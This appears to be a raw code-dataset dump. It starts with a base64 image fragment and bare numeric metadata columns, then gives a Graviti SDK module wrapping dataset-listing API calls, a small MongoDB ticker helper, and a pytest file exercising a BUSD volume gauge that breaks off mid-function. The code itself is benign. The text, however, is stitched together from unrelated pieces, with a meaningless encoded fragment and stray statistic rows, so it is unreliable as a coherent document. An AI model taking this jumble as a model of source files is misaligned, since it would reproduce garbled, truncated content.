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"}')
| 309.483871
| 8,345
| 0.931676
| 772
| 19,188
| 23.053109
| 0.393782
| 0.012643
| 0.013485
| 0.009103
| 0.97213
| 0.959207
| 0.958757
| 0.958757
| 0.9419
| 0.939821
| 0
| 0.140527
| 0.028716
| 19,188
| 61
| 8,346
| 314.557377
| 0.814401
| 0.00641
| 0
| 0.177778
| 0
| 0.044444
| 0.882325
| 0.876817
| 0
| 1
| 0
| 0
| 0.4
| 1
| 0.111111
| false
| 0
| 0.155556
| 0
| 0.288889
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
fa363704ca41abf33dd820cadc0c4f877e438a8f
| 19,361
|
py
|
Python
|
graviti/client/data.py
|
wangyuqing0424/graviti-python-sdk
|
66300cc1edda6a848cac094899afb3d0421c595d
|
[
"MIT"
] | null | null | null |
graviti/client/data.py
|
wangyuqing0424/graviti-python-sdk
|
66300cc1edda6a848cac094899afb3d0421c595d
|
[
"MIT"
] | null | null | null |
graviti/client/data.py
|
wangyuqing0424/graviti-python-sdk
|
66300cc1edda6a848cac094899afb3d0421c595d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright 2022 Graviti. Licensed under MIT License.
#
"""Interfaces about data."""
from typing import Any, Dict, Optional
from urllib.parse import urljoin
from graviti.client.requests import URL_PATH_PREFIX, open_api_do
def list_data(
    url: str,
    access_key: str,
    dataset_id: str,
    segment_name: str,
    *,
    draft_number: Optional[int] = None,
    commit: Optional[str] = None,
    offset: int = 0,
    limit: int = 128,
) -> Dict[str, Any]:
    """Execute the OpenAPI `GET /v1/datasets{id}/data`.

    Arguments:
        url: The URL of the graviti website.
        access_key: User's access key.
        dataset_id: Dataset ID.
        segment_name: The name of the segment.
        draft_number: The draft number.
        commit: The information to locate the specific commit, which can be
            the commit id, the branch name, or the tag name.
        offset: The offset of the page.
        limit: The limit of the page.

    Returns:
        The response of OpenAPI: a dict containing ``"segmentName"``,
        ``"type"``, a ``"data"`` list whose entries carry ``"remotePath"``
        and ``"checksum"``, plus the paging fields ``"offset"``,
        ``"recordSize"`` and ``"totalCount"``.

    """
    endpoint = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/data")
    params: Dict[str, Any] = {"segmentName": segment_name, "offset": offset, "limit": limit}
    # Only forward the version selectors the caller actually provided.
    # Truthiness (not an explicit None check) mirrors the original behaviour.
    for param_name, param_value in (("draftNumber", draft_number), ("commit", commit)):
        if param_value:
            params[param_name] = param_value
    return open_api_do(endpoint, access_key, "GET", params=params).json()  # type: ignore[no-any-return]
def list_data_details(
    url: str,
    access_key: str,
    dataset_id: str,
    segment_name: str,
    *,
    draft_number: Optional[int] = None,
    commit: Optional[str] = None,
    remote_path: Optional[str] = None,
    is_internal: bool = False,
    offset: int = 0,
    limit: int = 128,
) -> Dict[str, Any]:
    """Execute the OpenAPI `GET /v1/datasets{id}/data/details`.

    Arguments:
        url: The URL of the graviti website.
        access_key: User's access key.
        dataset_id: Dataset ID.
        segment_name: The name of the segment.
        draft_number: The draft number.
        commit: The information to locate the specific commit, which can be
            the commit id, the branch name, or the tag name.
        remote_path: The remote path of the data.
        is_internal: Whether the request is from internal.
        offset: The offset of the page.
        limit: The limit of the page.

    Returns:
        The response of OpenAPI: a dict containing ``"segmentName"``,
        ``"type"``, a ``"dataDetails"`` list whose entries carry
        ``"remotePath"``, ``"checksum"``, a presigned ``"url"`` and the
        data's ``"label"``, plus the paging fields ``"offset"``,
        ``"recordSize"`` and ``"totalCount"``.  Passing ``remote_path``
        narrows the listing to that single data entry.

    """
    endpoint = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/data/details")
    params: Dict[str, Any] = {"segmentName": segment_name, "offset": offset, "limit": limit}
    optional_params = (
        ("draftNumber", draft_number),
        ("commit", commit),
        ("remotePath", remote_path),
        ("isInternal", is_internal),
    )
    # Truthiness mirrors the original behaviour: unset / empty / False
    # selectors are simply omitted from the query string.
    for param_name, param_value in optional_params:
        if param_value:
            params[param_name] = param_value
    return open_api_do(endpoint, access_key, "GET", params=params).json()  # type: ignore[no-any-return]
def list_data_urls(
    url: str,
    access_key: str,
    dataset_id: str,
    segment_name: str,
    *,
    draft_number: Optional[int] = None,
    commit: Optional[str] = None,
    remote_path: Optional[str] = None,
    is_internal: bool = False,
    offset: int = 0,
    limit: int = 128,
) -> Dict[str, Any]:
    """Execute the OpenAPI `GET /v1/datasets{id}/data/urls`.

    Arguments:
        url: The URL of the graviti website.
        access_key: User's access key.
        dataset_id: Dataset ID.
        segment_name: The name of the segment.
        draft_number: The draft number.
        commit: The information to locate the specific commit, which can be
            the commit id, the branch name, or the tag name.
        remote_path: The remote path of the data.
        is_internal: Whether the request is from internal.
        offset: The offset of the page.
        limit: The limit of the page.

    Returns:
        The response of OpenAPI: a dict containing ``"segmentName"``, a
        ``"urls"`` list whose entries carry ``"remotePath"`` and a
        presigned ``"url"``, plus the paging fields ``"offset"``,
        ``"recordSize"`` and ``"totalCount"``.  Passing ``remote_path``
        narrows the listing to that single data entry.

    """
    endpoint = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/data/urls")
    params: Dict[str, Any] = {"segmentName": segment_name, "offset": offset, "limit": limit}
    optional_params = (
        ("draftNumber", draft_number),
        ("commit", commit),
        ("remotePath", remote_path),
        ("isInternal", is_internal),
    )
    # Truthiness mirrors the original behaviour: unset / empty / False
    # selectors are simply omitted from the query string.
    for param_name, param_value in optional_params:
        if param_value:
            params[param_name] = param_value
    return open_api_do(endpoint, access_key, "GET", params=params).json()  # type: ignore[no-any-return]
def list_mask_urls(
    url: str,
    access_key: str,
    dataset_id: str,
    segment_name: str,
    mask_type: str,
    *,
    draft_number: Optional[int] = None,
    commit: Optional[str] = None,
    remote_path: Optional[str] = None,
    is_internal: bool = False,
    offset: int = 0,
    limit: int = 128,
) -> Dict[str, Any]:
    """Execute the OpenAPI `GET /v1/datasets{id}/masks/urls`.

    Arguments:
        url: The URL of the graviti website.
        access_key: User's access key.
        dataset_id: Dataset ID.
        segment_name: The name of the segment.
        mask_type: The required mask type, one of ``SEMANTIC_MASK``,
            ``INSTANCE_MASK`` and ``PANOPTIC_MASK``.
        draft_number: The draft number.
        commit: The information to locate the specific commit, which can be the commit id,
            the branch name, or the tag name.
        remote_path: The remote path of the data.
        is_internal: Whether the request is from internal.
        offset: The offset of the page.
        limit: The limit of the page.

    Returns:
        The response of OpenAPI: a dict with ``segmentName``, ``urls`` (each entry
        holding ``remotePath`` and a presigned ``url``), ``offset``, ``recordSize``
        and ``totalCount`` keys.
    """
    request_url = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/masks/urls")
    params: Dict[str, Any] = {
        "segmentName": segment_name,
        "maskType": mask_type,
        "offset": offset,
        "limit": limit,
    }
    # Optional filters are attached only when truthy, matching the behaviour
    # of the other listing endpoints in this module.
    optional_filters = {
        "draftNumber": draft_number,
        "commit": commit,
        "remotePath": remote_path,
        "isInternal": is_internal,
    }
    params.update({key: value for key, value in optional_filters.items() if value})
    return open_api_do(request_url, access_key, "GET", params=params).json()  # type: ignore[no-any-return]
| 39.837449
| 100
| 0.541449
| 1,723
| 19,361
| 5.987232
| 0.113175
| 0.027918
| 0.012796
| 0.026755
| 0.857503
| 0.853044
| 0.826095
| 0.817953
| 0.793912
| 0.789647
| 0
| 0.144559
| 0.349724
| 19,361
| 485
| 101
| 39.919588
| 0.674821
| 0.761531
| 0
| 0.818182
| 0
| 0
| 0.132697
| 0.060037
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040404
| false
| 0
| 0.030303
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa686070d9db5729b703f86cbe6bdddc0cc9aa82
| 74
|
py
|
Python
|
db/ticker.py
|
CryptoInsights/query
|
7a3ba95f424b0a709ad1caa7fbd3d2386b69f7b6
|
[
"MIT"
] | null | null | null |
db/ticker.py
|
CryptoInsights/query
|
7a3ba95f424b0a709ad1caa7fbd3d2386b69f7b6
|
[
"MIT"
] | null | null | null |
db/ticker.py
|
CryptoInsights/query
|
7a3ba95f424b0a709ad1caa7fbd3d2386b69f7b6
|
[
"MIT"
] | null | null | null |
from .mongo import db
def get_all_tickers():
    """Return a cursor over every document in the ``coins`` collection."""
    coins_collection = db.coins
    return coins_collection.find()
| 12.333333
| 26
| 0.702703
| 12
| 74
| 4.166667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 74
| 5
| 27
| 14.8
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d72848d601a54da00c28d38fd56b6414b98bb83d
| 36,010
|
py
|
Python
|
tests/test_08_busdvolgauge.py
|
taariq/volumegauge
|
f92ea90f4eefab9079fd624bddbe0e3cf5684f80
|
[
"Apache-2.0"
] | 3
|
2020-12-17T01:11:08.000Z
|
2020-12-24T08:06:07.000Z
|
tests/test_08_busdvolgauge.py
|
taariq/volumegauge
|
f92ea90f4eefab9079fd624bddbe0e3cf5684f80
|
[
"Apache-2.0"
] | 13
|
2020-11-22T20:24:23.000Z
|
2021-01-07T20:19:57.000Z
|
tests/test_08_busdvolgauge.py
|
taariq/volumegauge
|
f92ea90f4eefab9079fd624bddbe0e3cf5684f80
|
[
"Apache-2.0"
] | 3
|
2020-12-17T18:32:46.000Z
|
2020-12-23T21:57:47.000Z
|
#!/usr/bin/python3
import pytest
# EMA window length, in periods, used by the volume gauge under test.
PERIOD = 30
# Fixed-point scale factor (18 decimals, ERC-20 style).
DENOMINATOR = 10 ** 18
# EMA smoothing constant (the standard "2 / (N + 1)" smoothing form).
SMOOTHING = 2
# EMA decay weight, scaled by DENOMINATOR.
# NOTE(review): true division makes ALPHA a float, while the on-chain
# counterpart presumably works in integer fixed-point — confirm the float
# approximation is intended for these printed diagnostics.
ALPHA = DENOMINATOR - SMOOTHING * DENOMINATOR / (PERIOD + 1)
def test_exchange_ydai_to_yusdc(_busdvolgauge, busdpool, yDAI_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_ydai(_busdvolgauge, busdpool, yUSDC_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ydai_to_yusdt(_busdvolgauge, busdpool, yDAI_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_ydai(_busdvolgauge, busdpool, yUSDT_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ydai_to_ybusd(_busdvolgauge, busdpool, yDAI_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(0, 3, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yDAI_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yDAI_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ybusd_to_ydai(_busdvolgauge, busdpool, yBUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(3, 0, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yBUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yBUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_yusdt(_busdvolgauge, busdpool, yUSDC_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_yusdc(_busdvolgauge, busdpool, yUSDT_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdc_to_ybusd(_busdvolgauge, busdpool, yUSDC_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDC_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDC_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_ybusd_to_yusdc(_busdvolgauge, busdpool, yBUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yBUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yBUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_yusdt_to_ybusd(_busdvolgauge, busdpool, yUSDT_BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange(2, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(yUSDT_BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(yUSDT_BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
